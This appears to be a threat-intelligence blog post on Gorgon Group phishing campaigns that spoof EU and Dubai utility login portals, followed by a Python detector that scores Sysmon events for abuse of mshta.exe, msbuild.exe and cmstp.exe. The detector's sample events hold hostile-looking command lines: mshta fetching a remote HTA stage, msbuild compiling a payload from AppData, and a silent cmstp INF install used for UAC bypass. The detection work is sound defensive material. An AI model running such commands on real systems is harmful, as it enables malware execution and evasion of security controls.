The expansion of Gorgon’s techniques indicates they aren’t just fishing for victims, but have targets in their sights.
Prevailion’s Tailored Intelligence team has uncovered details of new, sophisticated cyber-crime campaigns from the Gorgon Group, which now traps its victims through spoofed login portals for the European Union and a Dubai-based utility.
In October, the team first reported on the suspected Pakistani group’s MasterMana Botnet campaign. That operation continues today, alongside two newly discovered clusters of activity that show more targeted attacks, aimed at European travelers and at the Dubai Electricity and Water Authority.
Within each prong of its three-part attack, the Gorgon Group has avoided detection by implementing moderately sophisticated methods of bypassing common security mechanisms, making them a true threat to organizations that fall in their sights.
The tools for these attacks have included a new downloader that references the rapper Drake, a .NET executable named “Office” (used to bypass User Account Control and disable Windows Defender), a variant of the njRAT trojan, and a new, trojanized PowerPoint file.
Much of this new activity happens on domains hosted by the threat actors, who appear to be targeting European Union and Dubai utility employees by “spoofing” or impersonating legitimate login pages for these organizations.
One spoofed website depicted a login portal titled “European Union”, while a second login portal was labeled “DEWA Dubai”, presumably for the Dubai Electricity and Water Authority (DEWA). While we are unable to determine whether either site was operationalized, their presence suggests a more targeted component to this threat actor’s activities beyond the mass spamming used to build the MasterMana botnet.
Such attacks start with a malicious email; once the lure is activated, payloads are covertly loaded onto the computer, resulting in stolen credentials and confidential information.
Once a system was compromised, the threat actors ran their payloads through utilities that ship with every Windows installation (mshta.exe, msbuild.exe and cmstp.exe). Because these are signed Microsoft binaries that are trusted by default, routing execution through them helps the activity slip past controls that only look for unknown executables.
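Defenders who cannot block these binaries outright can at least alert on the way they are abused. The following is an added detection example, not code from the Prevailion report: it scores Sysmon Event ID 1 (process creation) records for the three utilities named above, using heuristics that are assumptions for illustration (Office applications as the parent, mshta.exe given a URL or inline script, cmstp.exe run with /ni /s, msbuild.exe compiling a project from a user-writable directory). The sample events are constructed here; paths and command lines do not come from the report.

```python
"""Flag process-creation events where a document-borne payload proxies
execution through mshta.exe, msbuild.exe or cmstp.exe.

Input is a list of Sysmon Event ID 1 records reduced to dicts with the
Image, ParentImage and CommandLine fields. All rules below are heuristic
assumptions for illustration, not rules published with the report."""
import ntpath
import re

# Binaries the article names as hijacked for proxy execution.
LOLBINS = {"mshta.exe", "msbuild.exe", "cmstp.exe"}
# Parents indicating a document-borne start (the campaign opens with email lures).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Parents under which msbuild.exe is ordinarily expected (assumption; tune per estate).
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(users|appdata|temp|programdata)\\", re.IGNORECASE)

# Constructed sample events (hypothetical paths and command lines).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "CommandLine": r"mshta.exe http://example.invalid/stage2.hta"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"MSBuild.exe C:\Users\victim\AppData\Roaming\payload.xml"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\victim\AppData\Local\Temp\x.inf"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\victim\notes.txt"},
]


def analyze(event):
    """Return the reasons this record looks like LOLBin abuse (empty list if benign)."""
    image = ntpath.basename(event["Image"]).lower()
    if image not in LOLBINS:
        return []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    lowered = cmd.lower()
    tokens = lowered.split()
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append("spawned by Office application")
    if image == "mshta.exe" and (
        URL_RE.search(cmd) or "vbscript:" in lowered or "javascript:" in lowered
    ):
        reasons.append("mshta.exe loading remote or inline script")
    if image == "cmstp.exe" and "/ni" in tokens and "/s" in tokens:
        reasons.append("cmstp.exe silent INF install (UAC bypass pattern)")
    if image == "msbuild.exe" and parent not in BUILD_PARENTS and USER_WRITABLE_RE.search(cmd):
        reasons.append("msbuild.exe compiling a project from a user-writable path")
    return reasons


def scan(events):
    """Return (index, image basename, reasons) for every event that trips a rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = analyze(event)
        if reasons:
            hits.append((i, ntpath.basename(event["Image"]).lower(), reasons))
    return hits


if __name__ == "__main__":
    for i, image, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {image}: {'; '.join(reasons)}")
```

The developer-driven MSBuild invocation (parented by devenv.exe, project under C:\src) is deliberately left unflagged; in an estate without developer workstations the parent whitelist can be emptied so that any msbuild.exe launch is reported. Parent-process checks alone are weak against a payload that first spawns cmd.exe, which is why the command-line rules are applied independently of the parent.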
The Tailored Intelligence team at Prevailion recommends applying Microsoft’s recommended block rules for Windows Defender Application Control to high-risk users, among other mitigations; those rules cover mshta.exe, msbuild.exe and cmstp.exe. To learn more, read the full Gorgon Group report on the Tailored Intelligence blog.